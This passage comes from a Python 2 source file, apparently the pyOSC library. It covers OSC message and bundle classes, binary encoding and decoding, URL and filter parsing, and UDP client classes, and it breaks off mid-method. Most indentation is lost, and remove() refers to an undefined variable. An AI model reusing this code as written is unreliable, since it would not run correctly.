On the Python end, OSCMessage are lists of arguments, prepended by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
>>> print msg
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
    Additional methods exist for retrieving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address="", *args):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument.
The rest of the arguments are appended as data.
"""
self.clear(address)
if len(args)>0:
self.append(*args)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = ""
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if type(argument) == types.DictType:
argument = argument.items()
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if hasattr(argument, '__iter__'):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
def __repr__(self):
"""Returns a string containing the decode Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(self.values()))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(self.values())
if type(values) == types.TupleType:
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = self.values()
typetags = self.tags()
for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in self.values())
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return self.values()[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = self.items()
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = values.items()
elif type(values) == types.ListType:
items = []
for val in values:
if type(val) == types.TupleType:
items.append(val[:2])
else:
items.append((typehint, val))
elif type(values) == types.TupleType:
items = [values[:2]]
else:
items = [(typehint, values)]
return items
def __setitem__(self, i, val):
"""Set indicatated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = self.items()
new_items = self._buildItemList(val)
if type(i) != types.SliceType:
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = self.items()
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return self.values().count(val)
def index(self, val):
"""Returns the index of the first occurence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return self.values().index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = self.items() + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = self.items()
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = self.items()
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = self.items()
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
Raises ValueError if val isn't found.
"""
items = self.items()
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
raise ValueError("'%s' not in OSCMessage" % str(m))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(self.values())
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(self.items())
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
    OSCMessage objects are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in self.values():
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
        If 'argument' is an iterable, its elements will be encapsulated by a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if type(argument) == types.DictType:
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
out = []
for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), str(next))
def OSCBlob(next):
"""Convert a string into an OSC Blob.
An OSC-Blob is a binary encoded block of data, prepended by a 'size' (int32).
    The size is always a multiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if type(next) in types.StringTypes:
OSCblobLength = math.ceil((len(next)) / 4.0) * 4
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next)
else:
binary = ""
return binary
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', long(secs), long(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0L, 1L)
return binary
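# Worked example (illustrative): for time = 1234567890.5 (Unix seconds),
#   fract, secs = math.modf(time)    # secs = 1234567890.0, fract = 0.5
#   secs - NTP_epoch                 # seconds since 1 Jan 1900
#   fract * NTP_units_per_second     # 0.5 * 0x100000000 = 0x80000000
# and both values are packed as big-endian uint32s. The (0, 1) tag produced
# for time <= 0 is the special OSC 'immediately' timetag.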
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
length = string.find(data,"\0")
nextData = int(math.ceil((length+1) / 4.0) * 4)
return (data[0:length], data[nextData:])
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print "Error: too few bytes for int", data, len(data)
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (long(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
time = int(NTP_epoch + high) + float(low / NTP_units_per_second)
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
    if(len(data)<4):
        print "Error: too few bytes for float", data, len(data)
        rest = data
        value = 0
    else:
        value = struct.unpack(">f", data[0:4])[0]
        rest = data[4:]
    return (value, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
    if(len(data)<8):
        print "Error: too few bytes for double", data, len(data)
        rest = data
        value = 0
    else:
        value = struct.unpack(">d", data[0:8])[0]
        rest = data[8:]
    return (value, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","):
for tag in typetags[1:]:
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
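# Example of the decoded structure (illustrative):
#   msg = OSCMessage("/test")
#   msg.extend([1, 2.0, "x"])
#   decodeOSC(msg.getBinary())  ->  ['/test', ',ifs', 1, 2.0, 'x']
# OSC-bundles decode recursively to ['#bundle', timetag, <decoded element>, ...].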
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print "byte 0 1 2 3 4 5 6 7 8 9 A B C D E F"
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % ord(bytes[i])
if (i+1) % 16 == 0:
print "%s: %s" % (line, repr(bytes[i-15:i+1]))
line = ""
bytes_left = num % 16
if bytes_left:
print "%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:]))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == types.TupleType:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if type(port) == types.IntType:
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
"""Convert provided string in 'host:port/prefix' format to it's components
Returns ((host, port), prefix)
"""
if not (type(url) in types.StringTypes and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
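# Example (illustrative; 'localhost' typically resolves to 127.0.0.1):
#   parseUrlStr("osc://localhost:9000/strings")
#   -> (('127.0.0.1', 9000), '/strings')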
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
self.setServer(server)
self.client_address = None
def _setSocket(self, skt):
"""Set and configure client socket"""
if self.socket != None:
self.close()
self.socket = skt
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
def _ensureConnected(self, address):
"""Make sure client has a socket connected to address"""
if not self.socket:
if len(address) == 4:
address_family = socket.AF_INET6
else:
address_family = socket.AF_INET
self._setSocket(socket.socket(address_family, socket.SOCK_DGRAM))
self.socket.connect(address)
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if server == None:
if hasattr(self,'server') and self.server:
if self.server.client != self:
raise OSCClientError("Internal inconsistency")
self.server.client.close()
self.server.client = None
self.server = None
return
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
self._setSocket(server.socket.dup())
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
if self.socket and other.socket:
            sockEqual = (self.socket._sock == other.socket._sock)
else:
sockEqual = (self.socket == None and other.socket == None)
if not sockEqual:
return False
if self.server and other.server:
            return self.server == other.server
else:
return self.server == None and other.server == None
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
if self.socket:
return self.socket.getpeername()
else:
return None
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self._ensureConnected(address)
self.client_address = address
except socket.error, e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
        - address: (host, port) tuple specifying remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self._ensureConnected(address)
self.socket.sendall(msg.getBinary())
if self.client_address:
self.socket.connect(self.client_address)
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
if not self.socket:
raise OSCClientError("Called send() on non-connected client")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending: %s" % str(e))
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if type(args) in types.StringTypes:
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
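# Example (illustrative):
#   parseFilterStr("/myprefix +/one -/two")
#   -> ['/myprefix', {'/one': True, '/two': False}]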
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in filters.keys():
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in filters.values():
out = ["+/*"]
else:
out = ["-/*"]
for (addr, bool) in filters.items():
if addr == '/*':
continue
if bool:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
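# Editor's sketch: a lone '-' filter implies an implicit pass-all ('+/*') head
# in the generated filter-string list.
def _example_getFilterStr():
    assert getFilterStr({"/mute": False}) == ["+/*", "-/mute"]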
# A translation-table for mapping OSC-address expressions to Python 're' expressions
OSCtrans = string.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
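# Editor's sketch: OSC wildcards map onto 're' syntax - '*' becomes '.*',
# '?' becomes '.', and '{a,b}' becomes '(a|b)'.
def _example_getRegEx():
    expr = getRegEx("/synth/{volume,mute}")
    assert expr.match("/synth/volume") is not None
    assert expr.match("/synth/pan") is None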
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
This client keeps a dict of 'OSCTargets', and sends each OSCMessage to each OSCTarget
The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
The OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
self.targets = {}
def _searchHostAddr(self, host):
"""Search the subscribed OSCTargets for (the first occurence of) given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in self.targets.keys():
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
def _updateFilters(self, dst, src):
"""Update a 'filters' dict with values form another 'filters' dict:
- src[a] == True and dst[a] == False: del dst[a]
- src[a] == False and dst[a] == True: del dst[a]
- a not in dst: dst[a] == src[a]
"""
if '/*' in src.keys(): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, bool) in src.items():
if (addr in dst.keys()) and (dst[addr] != bool):
del dst[addr]
else:
dst[addr] = bool
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in self.targets.keys():
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if type(filters) in types.StringTypes:
(_, filters) = parseFilterStr(filters)
elif type(filters) != types.DictType:
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
elif (type(address) == types.TupleType):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if type(address) == types.TupleType:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if type(address) == types.TupleType:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in self.targets.keys():
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in self.targets.items():
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if (type(address) == types.TupleType):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in self.targets.keys()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in dict.items():
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in self.targets.items():
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
def _filterMessage(self, filters, msg):
"""Checks the given OSCMessge against the given filters.
